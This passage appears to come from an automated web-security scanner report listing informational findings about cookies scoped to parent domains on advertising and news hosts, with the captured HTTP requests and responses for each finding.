X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.42. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5671&nid=2081&put=OO-00000000000000000&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2081=OO-00000000000000000; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.43. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fe3ac8db403a568 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%266073%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fe3ac8db403a568; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.44. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2863298321806118365&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2863298321806118365&rnd=9204366597143776733&fpid=6&nu=y&t=&sp=y&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2863298321806118365; expires=Sun, 06-Nov-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.45. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4214&nid=1197&put=3620501663059719663&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%264214%3D1; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%264214%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1197=3620501663059719663; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.46. http://pluck.abc.net.au/ver1.0/daapi2.api

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /ver1.0/daapi2.api

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3920
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')({
"Envelopes": [
{
"PayloadType": "Responses.Users.UserResponse",
"Payload": {
"User": {
"Age": "",
"Sex": "None",

...[SNIP]...

8.47. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:19:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:19:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:19:04 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.48. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:58 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:14:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:58 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.49. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 661
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:19 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.50. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
